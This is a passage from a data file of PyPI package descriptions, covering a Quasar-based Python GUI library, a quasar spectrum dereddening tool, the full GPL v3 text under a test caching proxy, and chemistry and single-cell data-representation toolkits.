code.importquasarguifromquasarguiimportDiv,QInput,QButton,Modelname=Model()defdisplay_notification():layout.api.plugins.notify(message=f'Hello,{name.value}!')layout=Div(styles={'max-width':'30em','margin-left':'auto','margin-right':'auto'},classes='q-mt-xl q-pt-lg text-center',children=[\"What's your name?\",QInput('Name',name),QButton('Submit',classes='text-primary',props={'size':'lg'},events={'click':display_notification})])quasargui.run(layout)# Shows a window with the layout.If you're interested how you can easily style buttons, check outQuasar's button apiQuasar's input apiFrom Quasar's pageany prop can be added to the corresponding quasargui component's props,any classes can be added to classes andany events can be added to events (without the @).Dynamic props (on Quasar's page it is in \":prop\" format) can be added usingModel:fromquasarguiimport*my_value=Model('my str')props={'string-prop':my_value}Model works with any json-like type (str, bool, int, list, dict).See further examples in the examples folder.Installation:At the moment this project is just a demo, featuring only a few components,\nbut it will be available on pip soon.Dependencies:pywebviewLicense:MIT licenseConcepts of quasarguiQuasargui package closely follows the structure of Quasar, and you can also easily integrate any Vue component. The most important is to have handy defaults so you only need to write code when you want to customize.The GUI builds up itself fromComponent's andModel's. To understand the logic of all components, let's examine a typical component.fromquasarguiimport*loading=Model(False)defconnect():loading.value=True;print('Connect button clicked')button=QButton(label='Connect',classes='q-ma-md',styles={'opacity':0.8},props={'no-caps':True,'loading':loading},events={'click':connect},children=[Slot('loading',[QSpinner(appearance='dots')])])In Vue,button's definition corresponds to:The common attributes of aComponentare:classes: custom css classes, separated by space (html class attribute)styles: custom styles applied (html style attribute)props: all the quasar attrs (no-caps is a constant attribute, loading is an attribute that is bound to a variable.)events: all the quasar \"@\" attrs. Events call the assigned callback in python.children: are list of the html children, everything that is between .... So,slotsare also set here withSlot('slot-name', [...list of children...]).Convenience:Argument order follows convenience. Some commonly used props of a component such aslabelare given a \"shortcut\" parameter, and even put into first position, so you don't need to type out its name.WritingQButton('OK')is the same asQButton(props={'label': 'OK'})but more concise.Type system:All arguments are typed so you can catch most of the errors with a type-checker. This is the benefit of having props and events separated.Formulas: If there's a formula in a Vue attribute, you need to useComputed.\nIf the componentrequiresJavaScript function to be used, you can resort toJSRaw.fromquasarguiimport*x,y=Model(2),Model(3)QInput(label=Computed(lambdax,y:f'{x}+{y}=',x,y),props={'rules':JSRaw(\"[value => value>0 || 'Enter a positive number']\")})Vue directives:If a component works withv-modelthen you can access it via themodelparameter. Otherv-'s such asv-ifcan be accessed as props.\nAdditionally,prop modifiersare simply put after the prop name as in Vue.Computed values:ModelandComputedwork like an excel sheet, whereModelis the normal data,Computedare the formulas. Everytime aModelchanges, it updates all its dependentComputedvalues. You can also hook intoModel's changes by adding a callback:fromquasarguiimport*model=Model()model.add_callback(lambda:print('model changed'))Convenience classesFor all the typical Python data-types quasargui package has a Component, designed to provide a convenient input.basic types: InputStr, InputInt, InputFloat, InputBool, InputListlist: InputList - tags, multi-select or checkboxes.choices: InputChoice - radio, button-group or select.file path: InputFile.datatime (data, time and datatime): InputDate, InputTime, InputDataTime are input fields with calendar/clock popup.hex color: InputColorOverriding defaultsSome other components try and guess your intent (QDrawer adds a sandwich menu button for itself, QHeader wraps its arguments into QToolbar&ToolbarTitle if necessary.)However, every automatic guess and default can be overridden. Some have parameter to disable (eg. automatic sandwich menu for QDrawer).\nIn components that have defaults, you can override default withdel YourComponent.defaults['props']['your-prop'].To remove a slot, addRemoveSlot('name')tochildren.Detailed documentationRead thefull documentationhere."} +{"package": "quasar-unred", "pacakge-description": "quasar_unredQuasar Unred is a Python library for determining the E(B-V) value of observed quasar spectra. It can also be used to appropriately deredden these spectra.Installationpip install quasar_unredqso_template.txt must be downloaded and in working directory for load_template() to work with no argument.UsageA simple demonstration is shown in quasar_unred_demo.ipynbIt is assumed that qso_template.txt and ukfs1037.p0236.final.dat are both downloaded and in your working directory.DependenciesDependencies for use are numpy, scipy, astropy, and dust_extinctionContributingPull requests are welcome. For major changes, please open an issue first\nto discuss what you would like to change.LicenseThis project is Copyright (c) John Klawitter and Eilat Glikman and licensed under the terms of the BSD 3-Clause license."} +{"package": "quasarx", "pacakge-description": "QuasarQuasar: Mistral, mastering mathematical reasoning.Features:Mistral7b finetuned on high quality tokens for stellar mathematical reasoning.Mistral7b extended to 16k seq and soon 32k and then 65k!High Quality reasoning for all reasoning intensive tasks.ArchitectureInstallUsageLicenseMIT"} +{"package": "quasi", "pacakge-description": "Copyright (C) 2007 Free Software Foundation, Inc. Everyone is permitted to copy and distribute verbatim copiesof this license document, but changing it is not allowed.PreambleThe GNU General Public License is a free, copyleft license forsoftware and other kinds of works.The licenses for most software and other practical works are designedto take away your freedom to share and change the works. By contrast,the GNU General Public License is intended to guarantee your freedom toshare and change all versions of a program--to make sure it remains freesoftware for all its users. We, the Free Software Foundation, use theGNU General Public License for most of our software; it applies also toany other work released this way by its authors. You can apply it toyour programs, too.When we speak of free software, we are referring to freedom, notprice. Our General Public Licenses are designed to make sure that youhave the freedom to distribute copies of free software (and charge forthem if you wish), that you receive source code or can get it if youwant it, that you can change the software or use pieces of it in newfree programs, and that you know you can do these things.To protect your rights, we need to prevent others from denying youthese rights or asking you to surrender the rights. Therefore, you havecertain responsibilities if you distribute copies of the software, or ifyou modify it: responsibilities to respect the freedom of others.For example, if you distribute copies of such a program, whethergratis or for a fee, you must pass on to the recipients the samefreedoms that you received. You must make sure that they, too, receiveor can get the source code. And you must show them these terms so theyknow their rights.Developers that use the GNU GPL protect your rights with two steps:(1) assert copyright on the software, and (2) offer you this Licensegiving you legal permission to copy, distribute and/or modify it.For the developers' and authors' protection, the GPL clearly explainsthat there is no warranty for this free software. For both users' andauthors' sake, the GPL requires that modified versions be marked aschanged, so that their problems will not be attributed erroneously toauthors of previous versions.Some devices are designed to deny users access to install or runmodified versions of the software inside them, although the manufacturercan do so. This is fundamentally incompatible with the aim ofprotecting users' freedom to change the software. The systematicpattern of such abuse occurs in the area of products for individuals touse, which is precisely where it is most unacceptable. Therefore, wehave designed this version of the GPL to prohibit the practice for thoseproducts. If such problems arise substantially in other domains, westand ready to extend this provision to those domains in future versionsof the GPL, as needed to protect the freedom of users.Finally, every program is threatened constantly by software patents.States should not allow patents to restrict development and use ofsoftware on general-purpose computers, but in those that do, we wish toavoid the special danger that patents applied to a free program couldmake it effectively proprietary. To prevent this, the GPL assures thatpatents cannot be used to render the program non-free.The precise terms and conditions for copying, distribution andmodification follow.TERMS AND CONDITIONS0. Definitions.\"This License\" refers to version 3 of the GNU General Public License.\"Copyright\" also means copyright-like laws that apply to other kinds ofworks, such as semiconductor masks.\"The Program\" refers to any copyrightable work licensed under thisLicense. Each licensee is addressed as \"you\". \"Licensees\" and\"recipients\" may be individuals or organizations.To \"modify\" a work means to copy from or adapt all or part of the workin a fashion requiring copyright permission, other than the making of anexact copy. The resulting work is called a \"modified version\" of theearlier work or a work \"based on\" the earlier work.A \"covered work\" means either the unmodified Program or a work basedon the Program.To \"propagate\" a work means to do anything with it that, withoutpermission, would make you directly or secondarily liable forinfringement under applicable copyright law, except executing it on acomputer or modifying a private copy. Propagation includes copying,distribution (with or without modification), making available to thepublic, and in some countries other activities as well.To \"convey\" a work means any kind of propagation that enables otherparties to make or receive copies. Mere interaction with a user througha computer network, with no transfer of a copy, is not conveying.An interactive user interface displays \"Appropriate Legal Notices\"to the extent that it includes a convenient and prominently visiblefeature that (1) displays an appropriate copyright notice, and (2)tells the user that there is no warranty for the work (except to theextent that warranties are provided), that licensees may convey thework under this License, and how to view a copy of this License. Ifthe interface presents a list of user commands or options, such as amenu, a prominent item in the list meets this criterion.1. Source Code.The \"source code\" for a work means the preferred form of the workfor making modifications to it. \"Object code\" means any non-sourceform of a work.A \"Standard Interface\" means an interface that either is an officialstandard defined by a recognized standards body, or, in the case ofinterfaces specified for a particular programming language, one thatis widely used among developers working in that language.The \"System Libraries\" of an executable work include anything, otherthan the work as a whole, that (a) is included in the normal form ofpackaging a Major Component, but which is not part of that MajorComponent, and (b) serves only to enable use of the work with thatMajor Component, or to implement a Standard Interface for which animplementation is available to the public in source code form. A\"Major Component\", in this context, means a major essential component(kernel, window system, and so on) of the specific operating system(if any) on which the executable work runs, or a compiler used toproduce the work, or an object code interpreter used to run it.The \"Corresponding Source\" for a work in object code form means allthe source code needed to generate, install, and (for an executablework) run the object code and to modify the work, including scripts tocontrol those activities. However, it does not include the work'sSystem Libraries, or general-purpose tools or generally available freeprograms which are used unmodified in performing those activities butwhich are not part of the work. For example, Corresponding Sourceincludes interface definition files associated with source files forthe work, and the source code for shared libraries and dynamicallylinked subprograms that the work is specifically designed to require,such as by intimate data communication or control flow between thosesubprograms and other parts of the work.The Corresponding Source need not include anything that userscan regenerate automatically from other parts of the CorrespondingSource.The Corresponding Source for a work in source code form is thatsame work.2. Basic Permissions.All rights granted under this License are granted for the term ofcopyright on the Program, and are irrevocable provided the statedconditions are met. This License explicitly affirms your unlimitedpermission to run the unmodified Program. The output from running acovered work is covered by this License only if the output, given itscontent, constitutes a covered work. This License acknowledges yourrights of fair use or other equivalent, as provided by copyright law.You may make, run and propagate covered works that you do notconvey, without conditions so long as your license otherwise remainsin force. You may convey covered works to others for the sole purposeof having them make modifications exclusively for you, or provide youwith facilities for running those works, provided that you comply withthe terms of this License in conveying all material for which you donot control copyright. Those thus making or running the covered worksfor you must do so exclusively on your behalf, under your directionand control, on terms that prohibit them from making any copies ofyour copyrighted material outside their relationship with you.Conveying under any other circumstances is permitted solely underthe conditions stated below. Sublicensing is not allowed; section 10makes it unnecessary.3. Protecting Users' Legal Rights From Anti-Circumvention Law.No covered work shall be deemed part of an effective technologicalmeasure under any applicable law fulfilling obligations under article11 of the WIPO copyright treaty adopted on 20 December 1996, orsimilar laws prohibiting or restricting circumvention of suchmeasures.When you convey a covered work, you waive any legal power to forbidcircumvention of technological measures to the extent such circumventionis effected by exercising rights under this License with respect tothe covered work, and you disclaim any intention to limit operation ormodification of the work as a means of enforcing, against the work'susers, your or third parties' legal rights to forbid circumvention oftechnological measures.4. Conveying Verbatim Copies.You may convey verbatim copies of the Program's source code as youreceive it, in any medium, provided that you conspicuously andappropriately publish on each copy an appropriate copyright notice;keep intact all notices stating that this License and anynon-permissive terms added in accord with section 7 apply to the code;keep intact all notices of the absence of any warranty; and give allrecipients a copy of this License along with the Program.You may charge any price or no price for each copy that you convey,and you may offer support or warranty protection for a fee.5. Conveying Modified Source Versions.You may convey a work based on the Program, or the modifications toproduce it from the Program, in the form of source code under theterms of section 4, provided that you also meet all of these conditions:a) The work must carry prominent notices stating that you modifiedit, and giving a relevant date.b) The work must carry prominent notices stating that it isreleased under this License and any conditions added under section7. This requirement modifies the requirement in section 4 to\"keep intact all notices\".c) You must license the entire work, as a whole, under thisLicense to anyone who comes into possession of a copy. ThisLicense will therefore apply, along with any applicable section 7additional terms, to the whole of the work, and all its parts,regardless of how they are packaged. This License gives nopermission to license the work in any other way, but it does notinvalidate such permission if you have separately received it.d) If the work has interactive user interfaces, each must displayAppropriate Legal Notices; however, if the Program has interactiveinterfaces that do not display Appropriate Legal Notices, yourwork need not make them do so.A compilation of a covered work with other separate and independentworks, which are not by their nature extensions of the covered work,and which are not combined with it such as to form a larger program,in or on a volume of a storage or distribution medium, is called an\"aggregate\" if the compilation and its resulting copyright are notused to limit the access or legal rights of the compilation's usersbeyond what the individual works permit. Inclusion of a covered workin an aggregate does not cause this License to apply to the otherparts of the aggregate.6. Conveying Non-Source Forms.You may convey a covered work in object code form under the termsof sections 4 and 5, provided that you also convey themachine-readable Corresponding Source under the terms of this License,in one of these ways:a) Convey the object code in, or embodied in, a physical product(including a physical distribution medium), accompanied by theCorresponding Source fixed on a durable physical mediumcustomarily used for software interchange.b) Convey the object code in, or embodied in, a physical product(including a physical distribution medium), accompanied by awritten offer, valid for at least three years and valid for aslong as you offer spare parts or customer support for that productmodel, to give anyone who possesses the object code either (1) acopy of the Corresponding Source for all the software in theproduct that is covered by this License, on a durable physicalmedium customarily used for software interchange, for a price nomore than your reasonable cost of physically performing thisconveying of source, or (2) access to copy theCorresponding Source from a network server at no charge.c) Convey individual copies of the object code with a copy of thewritten offer to provide the Corresponding Source. Thisalternative is allowed only occasionally and noncommercially, andonly if you received the object code with such an offer, in accordwith subsection 6b.d) Convey the object code by offering access from a designatedplace (gratis or for a charge), and offer equivalent access to theCorresponding Source in the same way through the same place at nofurther charge. You need not require recipients to copy theCorresponding Source along with the object code. If the place tocopy the object code is a network server, the Corresponding Sourcemay be on a different server (operated by you or a third party)that supports equivalent copying facilities, provided you maintainclear directions next to the object code saying where to find theCorresponding Source. Regardless of what server hosts theCorresponding Source, you remain obligated to ensure that it isavailable for as long as needed to satisfy these requirements.e) Convey the object code using peer-to-peer transmission, providedyou inform other peers where the object code and CorrespondingSource of the work are being offered to the general public at nocharge under subsection 6d.A separable portion of the object code, whose source code is excludedfrom the Corresponding Source as a System Library, need not beincluded in conveying the object code work.A \"User Product\" is either (1) a \"consumer product\", which means anytangible personal property which is normally used for personal, family,or household purposes, or (2) anything designed or sold for incorporationinto a dwelling. In determining whether a product is a consumer product,doubtful cases shall be resolved in favor of coverage. For a particularproduct received by a particular user, \"normally used\" refers to atypical or common use of that class of product, regardless of the statusof the particular user or of the way in which the particular useractually uses, or expects or is expected to use, the product. A productis a consumer product regardless of whether the product has substantialcommercial, industrial or non-consumer uses, unless such uses representthe only significant mode of use of the product.\"Installation Information\" for a User Product means any methods,procedures, authorization keys, or other information required to installand execute modified versions of a covered work in that User Product froma modified version of its Corresponding Source. The information mustsuffice to ensure that the continued functioning of the modified objectcode is in no case prevented or interfered with solely becausemodification has been made.If you convey an object code work under this section in, or with, orspecifically for use in, a User Product, and the conveying occurs aspart of a transaction in which the right of possession and use of theUser Product is transferred to the recipient in perpetuity or for afixed term (regardless of how the transaction is characterized), theCorresponding Source conveyed under this section must be accompaniedby the Installation Information. But this requirement does not applyif neither you nor any third party retains the ability to installmodified object code on the User Product (for example, the work hasbeen installed in ROM).The requirement to provide Installation Information does not include arequirement to continue to provide support service, warranty, or updatesfor a work that has been modified or installed by the recipient, or forthe User Product in which it has been modified or installed. Access to anetwork may be denied when the modification itself materially andadversely affects the operation of the network or violates the rules andprotocols for communication across the network.Corresponding Source conveyed, and Installation Information provided,in accord with this section must be in a format that is publiclydocumented (and with an implementation available to the public insource code form), and must require no special password or key forunpacking, reading or copying.7. Additional Terms.\"Additional permissions\" are terms that supplement the terms of thisLicense by making exceptions from one or more of its conditions.Additional permissions that are applicable to the entire Program shallbe treated as though they were included in this License, to the extentthat they are valid under applicable law. If additional permissionsapply only to part of the Program, that part may be used separatelyunder those permissions, but the entire Program remains governed bythis License without regard to the additional permissions.When you convey a copy of a covered work, you may at your optionremove any additional permissions from that copy, or from any part ofit. (Additional permissions may be written to require their ownremoval in certain cases when you modify the work.) You may placeadditional permissions on material, added by you to a covered work,for which you have or can give appropriate copyright permission.Notwithstanding any other provision of this License, for material youadd to a covered work, you may (if authorized by the copyright holders ofthat material) supplement the terms of this License with terms:a) Disclaiming warranty or limiting liability differently from theterms of sections 15 and 16 of this License; orb) Requiring preservation of specified reasonable legal notices orauthor attributions in that material or in the Appropriate LegalNotices displayed by works containing it; orc) Prohibiting misrepresentation of the origin of that material, orrequiring that modified versions of such material be marked inreasonable ways as different from the original version; ord) Limiting the use for publicity purposes of names of licensors orauthors of the material; ore) Declining to grant rights under trademark law for use of sometrade names, trademarks, or service marks; orf) Requiring indemnification of licensors and authors of thatmaterial by anyone who conveys the material (or modified versions ofit) with contractual assumptions of liability to the recipient, forany liability that these contractual assumptions directly impose onthose licensors and authors.All other non-permissive additional terms are considered \"furtherrestrictions\" within the meaning of section 10. If the Program as youreceived it, or any part of it, contains a notice stating that it isgoverned by this License along with a term that is a furtherrestriction, you may remove that term. If a license document containsa further restriction but permits relicensing or conveying under thisLicense, you may add to a covered work material governed by the termsof that license document, provided that the further restriction doesnot survive such relicensing or conveying.If you add terms to a covered work in accord with this section, youmust place, in the relevant source files, a statement of theadditional terms that apply to those files, or a notice indicatingwhere to find the applicable terms.Additional terms, permissive or non-permissive, may be stated in theform of a separately written license, or stated as exceptions;the above requirements apply either way.8. Termination.You may not propagate or modify a covered work except as expresslyprovided under this License. Any attempt otherwise to propagate ormodify it is void, and will automatically terminate your rights underthis License (including any patent licenses granted under the thirdparagraph of section 11).However, if you cease all violation of this License, then yourlicense from a particular copyright holder is reinstated (a)provisionally, unless and until the copyright holder explicitly andfinally terminates your license, and (b) permanently, if the copyrightholder fails to notify you of the violation by some reasonable meansprior to 60 days after the cessation.Moreover, your license from a particular copyright holder isreinstated permanently if the copyright holder notifies you of theviolation by some reasonable means, this is the first time you havereceived notice of violation of this License (for any work) from thatcopyright holder, and you cure the violation prior to 30 days afteryour receipt of the notice.Termination of your rights under this section does not terminate thelicenses of parties who have received copies or rights from you underthis License. If your rights have been terminated and not permanentlyreinstated, you do not qualify to receive new licenses for the samematerial under section 10.9. Acceptance Not Required for Having Copies.You are not required to accept this License in order to receive orrun a copy of the Program. Ancillary propagation of a covered workoccurring solely as a consequence of using peer-to-peer transmissionto receive a copy likewise does not require acceptance. However,nothing other than this License grants you permission to propagate ormodify any covered work. These actions infringe copyright if you donot accept this License. Therefore, by modifying or propagating acovered work, you indicate your acceptance of this License to do so.10. Automatic Licensing of Downstream Recipients.Each time you convey a covered work, the recipient automaticallyreceives a license from the original licensors, to run, modify andpropagate that work, subject to this License. You are not responsiblefor enforcing compliance by third parties with this License.An \"entity transaction\" is a transaction transferring control of anorganization, or substantially all assets of one, or subdividing anorganization, or merging organizations. If propagation of a coveredwork results from an entity transaction, each party to thattransaction who receives a copy of the work also receives whateverlicenses to the work the party's predecessor in interest had or couldgive under the previous paragraph, plus a right to possession of theCorresponding Source of the work from the predecessor in interest, ifthe predecessor has it or can get it with reasonable efforts.You may not impose any further restrictions on the exercise of therights granted or affirmed under this License. For example, you maynot impose a license fee, royalty, or other charge for exercise ofrights granted under this License, and you may not initiate litigation(including a cross-claim or counterclaim in a lawsuit) alleging thatany patent claim is infringed by making, using, selling, offering forsale, or importing the Program or any portion of it.11. Patents.A \"contributor\" is a copyright holder who authorizes use under thisLicense of the Program or a work on which the Program is based. Thework thus licensed is called the contributor's \"contributor version\".A contributor's \"essential patent claims\" are all patent claimsowned or controlled by the contributor, whether already acquired orhereafter acquired, that would be infringed by some manner, permittedby this License, of making, using, or selling its contributor version,but do not include claims that would be infringed only as aconsequence of further modification of the contributor version. Forpurposes of this definition, \"control\" includes the right to grantpatent sublicenses in a manner consistent with the requirements ofthis License.Each contributor grants you a non-exclusive, worldwide, royalty-freepatent license under the contributor's essential patent claims, tomake, use, sell, offer for sale, import and otherwise run, modify andpropagate the contents of its contributor version.In the following three paragraphs, a \"patent license\" is any expressagreement or commitment, however denominated, not to enforce a patent(such as an express permission to practice a patent or covenant not tosue for patent infringement). To \"grant\" such a patent license to aparty means to make such an agreement or commitment not to enforce apatent against the party.If you convey a covered work, knowingly relying on a patent license,and the Corresponding Source of the work is not available for anyoneto copy, free of charge and under the terms of this License, through apublicly available network server or other readily accessible means,then you must either (1) cause the Corresponding Source to be soavailable, or (2) arrange to deprive yourself of the benefit of thepatent license for this particular work, or (3) arrange, in a mannerconsistent with the requirements of this License, to extend the patentlicense to downstream recipients. \"Knowingly relying\" means you haveactual knowledge that, but for the patent license, your conveying thecovered work in a country, or your recipient's use of the covered workin a country, would infringe one or more identifiable patents in thatcountry that you have reason to believe are valid.If, pursuant to or in connection with a single transaction orarrangement, you convey, or propagate by procuring conveyance of, acovered work, and grant a patent license to some of the partiesreceiving the covered work authorizing them to use, propagate, modifyor convey a specific copy of the covered work, then the patent licenseyou grant is automatically extended to all recipients of the coveredwork and works based on it.A patent license is \"discriminatory\" if it does not include withinthe scope of its coverage, prohibits the exercise of, or isconditioned on the non-exercise of one or more of the rights that arespecifically granted under this License. You may not convey a coveredwork if you are a party to an arrangement with a third party that isin the business of distributing software, under which you make paymentto the third party based on the extent of your activity of conveyingthe work, and under which the third party grants, to any of theparties who would receive the covered work from you, a discriminatorypatent license (a) in connection with copies of the covered workconveyed by you (or copies made from those copies), or (b) primarilyfor and in connection with specific products or compilations thatcontain the covered work, unless you entered into that arrangement,or that patent license was granted, prior to 28 March 2007.Nothing in this License shall be construed as excluding or limitingany implied license or other defenses to infringement that mayotherwise be available to you under applicable patent law.12. No Surrender of Others' Freedom.If conditions are imposed on you (whether by court order, agreement orotherwise) that contradict the conditions of this License, they do notexcuse you from the conditions of this License. If you cannot convey acovered work so as to satisfy simultaneously your obligations under thisLicense and any other pertinent obligations, then as a consequence you maynot convey it at all. For example, if you agree to terms that obligate youto collect a royalty for further conveying from those to whom you conveythe Program, the only way you could satisfy both those terms and thisLicense would be to refrain entirely from conveying the Program.13. Use with the GNU Affero General Public License.Notwithstanding any other provision of this License, you havepermission to link or combine any covered work with a work licensedunder version 3 of the GNU Affero General Public License into a singlecombined work, and to convey the resulting work. The terms of thisLicense will continue to apply to the part which is the covered work,but the special requirements of the GNU Affero General Public License,section 13, concerning interaction through a network will apply to thecombination as such.14. Revised Versions of this License.The Free Software Foundation may publish revised and/or new versions ofthe GNU General Public License from time to time. Such new versions willbe similar in spirit to the present version, but may differ in detail toaddress new problems or concerns.Each version is given a distinguishing version number. If theProgram specifies that a certain numbered version of the GNU GeneralPublic License \"or any later version\" applies to it, you have theoption of following the terms and conditions either of that numberedversion or of any later version published by the Free SoftwareFoundation. If the Program does not specify a version number of theGNU General Public License, you may choose any version ever publishedby the Free Software Foundation.If the Program specifies that a proxy can decide which futureversions of the GNU General Public License can be used, that proxy'spublic statement of acceptance of a version permanently authorizes youto choose that version for the Program.Later license versions may give you additional or differentpermissions. However, no additional obligations are imposed on anyauthor or copyright holder as a result of your choosing to follow alater version.15. Disclaimer of Warranty.THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BYAPPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHTHOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTYOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULARPURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAMIS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OFALL NECESSARY SERVICING, REPAIR OR CORRECTION.16. Limitation of Liability.IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITINGWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYSTHE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANYGENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THEUSE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OFDATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRDPARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OFSUCH DAMAGES.17. Interpretation of Sections 15 and 16.If the disclaimer of warranty and limitation of liability providedabove cannot be given local legal effect according to their terms,reviewing courts shall apply local law that most closely approximatesan absolute waiver of all civil liability in connection with theProgram, unless a warranty or assumption of liability accompanies acopy of the Program in return for a fee.END OF TERMS AND CONDITIONSHow to Apply These Terms to Your New ProgramsIf you develop a new program, and you want it to be of the greatestpossible use to the public, the best way to achieve this is to make itfree software which everyone can redistribute and change under these terms.To do so, attach the following notices to the program. It is safestto attach them to the start of each source file to most effectivelystate the exclusion of warranty; and each file should have at leastthe \"copyright\" line and a pointer to where the full notice is found.Copyright (C) This program is free software: you can redistribute it and/or modifyit under the terms of the GNU General Public License as published bythe Free Software Foundation, either version 3 of the License, or(at your option) any later version.This program is distributed in the hope that it will be useful,but WITHOUT ANY WARRANTY; without even the implied warranty ofMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See theGNU General Public License for more details.You should have received a copy of the GNU General Public Licensealong with this program. If not, see .Also add information on how to contact you by electronic and paper mail.If the program does terminal interaction, make it output a shortnotice like this when it starts in an interactive mode: Copyright (C) This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.This is free software, and you are welcome to redistribute itunder certain conditions; type `show c' for details.The hypothetical commands `show w' and `show c' should show the appropriateparts of the General Public License. Of course, your program's commandsmight be different; for a GUI interface, you would use an \"about box\".You should also get your employer (if you work as a programmer) or school,if any, to sign a \"copyright disclaimer\" for the program, if necessary.For more information on this, and how to apply and follow the GNU GPL, see.The GNU General Public License does not permit incorporating your programinto proprietary programs. If your program is a subroutine library, youmay consider it more useful to permit linking proprietary applications withthe library. If this is what you want to do, use the GNU Lesser GeneralPublic License instead of this License. But first, please read.Description-Content-Type: UNKNOWNDescription: #+TITLE: QuasiSimple server which wraps requests and rewrites urls, useful for tests it will load a cached version if it exists* Building#+BEGIN_SRC shell :results rawdocker build -t quasi:latest .#+END_SRC* Launching#+BEGIN_SRC shelldocker run quasi:latest#+END_SRC* Environment** QUASI_DEBUGSet this to true or false to enable debugging** QUASI_STUBBED_DOMAINThis is the real domain point your app at quasi and set this to the real url, first time apage is accessed quasi will get from the original domain and use the cached version going forward.** QUASI_TOKENIf you need an auth token you can set one in this env for your remote domain** QUASI_STOREThe location you wish to store the requests, usually in a git test folder so it always works with your tests.Platform: UNKNOWNClassifier: Intended Audience :: DevelopersClassifier: License :: OSI Approved :: GPL-3 LicenseClassifier: Environment :: Web EnvironmentClassifier: Development Status :: 5 - Production/StableClassifier: Programming Language :: PythonClassifier: Operating System :: OS IndependentClassifier: Topic :: Software Development :: Libraries :: Python ModulesClassifier: Topic :: InternetClassifier: Topic :: Internet :: WWW/HTTPClassifier: Topic :: Internet :: WWW/HTTP :: WSGI"} +{"package": "quasicode", "pacakge-description": "No description available on PyPI."} +{"package": "quasielasticbayes", "pacakge-description": "This package wraps fortran Bayesian fitting libraries using f2py. An application of this package is to fit quasi-elasticneutron scattering data in Mantid (https://www.mantidproject.org)"} +{"package": "quasigraph", "pacakge-description": "Quasigraphis an open-source toolkit designed for generating chemical and geometric descriptors to be used in machine learning models.InstallationThe easiest method to install quasigraph is by utilizing pip:$pipinstallquasigraphGetting startedfromase.buildimportmoleculefromquasigraphimportQuasiGraph# Initialize an Atoms object for methanol (CH3OH) using ASE's molecule functionatoms=molecule('CH3OH')# Instantiate a QuasiGraph object containing chemical and coordination numbersqgr=QuasiGraph(atoms)# Convert the QuasiGraph object into a pandas DataFramedf=qgr.get_dataframe()# Convert the QuasiGraph object into a vectorvector=qgr.get_vector()DescriptorThe descriptor can be separated into two parts, a chemical part and a geometric part.Chemical partThe chemical part of the descriptor employs theMendeleev library, incorporating atomic details like the valence electron concentration, covalent radius, atomic radius, Pauling electronegativity and electron affinitity for every element within the object.For example, for methanol (CH3OH) we have the table:VECcovalent_radiusen_pauling040.752.55160.633.44210.322.2310.322.2410.322.2510.322.2Geometric partThe geometric part involves identifying all bonds and computing the coordination numbers for each atom, indicated as CN. Additionally, the generalized coordination number (GCN)[^1] is determined by summing the coordination numbers of the neighboring ligands for each atom and normalizing this sum by the highest coordination number found in the molecule.Figure 1- Schematic representation of the methanol molecule, indicating the chemical symbol and coordination number (CN) for every atom.For example, for methanol (CH3OH) we have the geometric data, as shown inFig. 1.CNGCN41.2521.2511.0010.5011.0011.00LicenseThis is an open source code underMIT License.AcknowledgementsWe thank financial support from FAPESP (Grant No. 2022/14549-3), INCT Materials Informatics (Grant No. 406447/2022-5), and CNPq (Grant No. 311324/2020-7).[^1]: Calle-Vallejo, F., Mart\u00ednez, J. I., Garc\u00eda-Lastra, J. M., Sautet, P. & Loffreda, D.Fast Prediction of Adsorption Properties for Platinum Nanocatalysts with Generalized Coordination Numbers,Angew. Chem. Int. Ed.53, 8316-8319 (2014)."} +{"package": "quasildr", "pacakge-description": "An analytical framework for interpretable and generalizable single-cell data analysisQuasildr is a python library for quasilinear data representation methods.\nIt implements two methods, a data representation or visualization\nmethodGraphDRand a generalized trajectory extraction and inference methodStructDR(StructDR is based on nonparametric ridge estimation). The Quasildr package is developed for\nsingle-cell omics data analysis, but supports other\ndata types as well. The manuscript is availablehere.InstallYou can install withconda install -c main -c conda-forge -c bioconda quasildror withpip install quasildr. You can also clone the respository and install withgit clone https://github.com/jzthree/quasildr; cd quasildr; python setup.py install.Quick StartFor learning about the package, we recommend checking out thetutorials. We provide them in both jupyter notebooks format (you may use nteracthttps://nteract.io/to open them) or html files rendered from jupyter notebooks. The visualizations are large so Github does not allow preview, and you need to download it first. For various manuscript examples, checkout jupyter notebooks in theManuscriptdirectory.As a quickest possible introduction, a minimum example python snippet that running these methods are below#GraphDRimportquasildr.graphdrimportgraphdrZ=graphdr(X_pca,regularization=500)#StructDRimportquasildr.structdrimportScmsZ=Z/Z[:,0].std()s=Scms(Z,bw=0.1,min_radius=10)T=s.scms(Z)If you are analyzing single-cell data, you may consider using our\ngraphical interface for single-cell omics data analysisTrenti.DocumentationSee full API documentationhere. For a high-level introduction to two main methods in quasildr, GraphDR and StructDR (DR means Data Representation):Update logv0.2.2 (10/05/2021): Update the Trenti graphical interface app to use Dash 2.0. Bug fixes for Trenti and speed improvement from Dash 2.0.0.\nPlease update to Dash 2.0 if you will use Trenti.GraphDR - visualization and general-purpose representation:GraphDR is a nonlinear representation method\nthat preserves the interpretation of a corresponding linear space, while being able to well represent cell\nidentities like nonlinear methods. Unlike popular nonlinear methods, GraphDR allows 